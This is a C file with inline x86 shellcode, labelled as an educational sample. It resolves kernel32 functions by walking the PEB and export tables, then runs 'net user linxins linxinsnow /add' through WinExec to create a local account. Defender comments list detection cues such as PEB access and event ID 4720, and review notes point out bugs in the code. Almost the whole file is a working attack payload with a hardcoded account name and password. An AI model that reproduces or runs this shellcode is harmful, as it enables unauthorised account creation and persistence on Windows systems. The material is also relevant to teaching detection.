#include <windows.h>
int main()
{
    // Educational sample: position-independent 32-bit x86 shellcode wrapped in
    // MSVC inline assembly.  It resolves kernel32 exports by walking the PEB
    // loader list and parsing IMAGE_EXPORT_DIRECTORY by name (no imports, no
    // fixed addresses), builds its strings on the stack, and calls WinExec.
    //
    // Defender notes (what makes this recognisable):
    //  - fs:[30h] (PEB) access followed by Ldr list traversal and manual export
    //    directory parsing is the classic API-resolution pattern that heuristic
    //    scanners and EDR rules key on.
    //  - Every API name and the command line are pushed as plain ASCII dwords
    //    ('GetP','rocA','WinE','xec',...), so they are visible to static scanning.
    //  - Local account creation via "net user ... /add" needs administrative
    //    rights and is recorded by Windows security auditing (event ID 4720).
    //  - The process terminates via ExitProcess inside the asm block; the
    //    `return 0` below is never reached and no stack is ever cleaned up.
    //
    // Register roles once setup is done:
    //   edi = kernel32 image base, edx = export directory (VA),
    //   ebp = base of a 0x40-byte scratch area used as a small pointer table
    //         ([ebp+40h] GetProcAddress, [ebp+8h] WinExec, [ebp+12h] Sleep,
    //          [ebp+16h] ExitProcess — offsets are hex, unaligned but disjoint).
__asm{
push ebp ;save caller ebp (never restored — control never returns past ExitProcess)
sub esp, 0x40; reserve 0x40 bytes of scratch (the trailing ';' opens a comment in MSVC inline asm)
mov ebp, esp; ebp = bottom of the scratch area
push ebp
mov eax, fs:0x30 ;eax = PEB (TEB->ProcessEnvironmentBlock)
mov eax, [eax+0x0c] ;eax = PEB->Ldr (PEB_LDR_DATA)
mov esi, [eax+0x1c] ;esi = Ldr->InInitializationOrderModuleList.Flink
lodsd ;eax = following list entry (advance one link)
mov edi, [eax+0x08] ;edi = DllBase of that entry, assumed to be kernel32.dll — NOTE(review): which module sits here depends on the OS version's load order; confirm
mov eax, [edi+3Ch] ;eax = e_lfanew (RVA of the PE header)
mov edx, [edi+eax+78h] ;edx = export directory RVA (DataDirectory[0] at PE header + 78h)
add edx, edi ;edx = IMAGE_EXPORT_DIRECTORY (VA)
mov ecx, [edx+18h] ;ecx = NumberOfNames (count of exported names)
mov ebx, [edx+20h]
add ebx, edi ;ebx = AddressOfNames table (VA)
search: ;scan the name table from the last entry downwards
dec ecx ;ecx = index of the name under test (no lower bound: a missing name would run off the table)
mov esi, [ebx+ecx*4]
add esi, edi ;esi = VA of this export's name string
;match "GetProcAddress" by its first 8 bytes only
mov eax, 0x50746547
cmp [esi], eax ;first dword == 'GetP' (stored little-endian, reads as 'PteG')
jne search
mov eax, 0x41636f72
cmp [esi+4], eax ;second dword == 'rocA'
jne search
;prefix "GetProcA" matched — treated as GetProcAddress (assumes no other export shares that prefix)
mov ebx, [edx+24h]
add ebx, edi ;ebx = AddressOfNameOrdinals table (VA)
mov cx, [ebx+ecx*2] ;cx = ordinal for that name (16-bit write: upper half of ecx keeps the old index, harmless only while the index < 10000h)
mov ebx, [edx+1Ch]
add ebx, edi ;ebx = AddressOfFunctions table (VA)
mov eax, [ebx+ecx*4]
add eax, edi ;eax = GetProcAddress (RVA + image base)
mov [ebp+40h], eax ;GetProcAddress saved at [ebp+40h] — this slot is the ebp pushed first, which is overwritten
push dword ptr 0x00636578 ;//build "WinExec\0" on the stack: "xec\0"
push dword ptr 0x456e6957 ;"WinE"
push esp ;lpProcName = pointer to the string just pushed
push edi ;hModule = kernel32 base
call [ebp+40h] ;//GetProcAddress(kernel32, "WinExec")
mov [ebp+8h], eax ;//WinExec address stored at [ebp+8h]
push dword ptr 0x00000070 ;//build "Sleep\0": "p\0\0\0"
push dword ptr 0x65656C53 ;"Slee"
push esp
push edi
call [ebp+40h] ;//GetProcAddress(kernel32, "Sleep")
mov [ebp+12h], eax ;//Sleep address stored at [ebp+12h] (resolved but never called in this listing)
push dword ptr 0x00737365 ;//build "ExitProcess\0": "ess\0"
push dword ptr 0x636f7250 ;"Proc"
push dword ptr 0x74697845 ;"Exit"
push esp
push edi
call [ebp+40h] ;//GetProcAddress(kernel32, "ExitProcess")
mov [ebp+16h], eax ;//ExitProcess address stored at [ebp+16h]
push 0 ;zero padding above the command string — NOTE(review): this is not the uCmdShow WinExec sees; the callee reads its second argument from the dword pushed last ("net ")
push dword ptr 0x00646461 ;add\0
push dword ptr 0x2F20776F ;ow /
push dword ptr 0x6E736E69 ;insn
push dword ptr 0x786E696C ;linx
push dword ptr 0x20776F6E ;now 
push dword ptr 0x736E6978 ;xins
push dword ptr 0x6E696C20 ; lin
push dword ptr 0x72657375 ;user
push dword ptr 0x2074656E ;net  — read upwards the stack now holds "net user linxins linxinsnow /add"
push esp ;lpCmdLine = pointer to that string
Call [ebp+8h] ;WinExec(lpCmdLine, ...)
push 0 ;ExitProcess exit code 0
call [ebp+16h] ;//finish with ExitProcess so the process exits cleanly instead of faulting on the unbalanced stack
}
return 0; // unreachable: ExitProcess above terminates the process
}
添加用户代码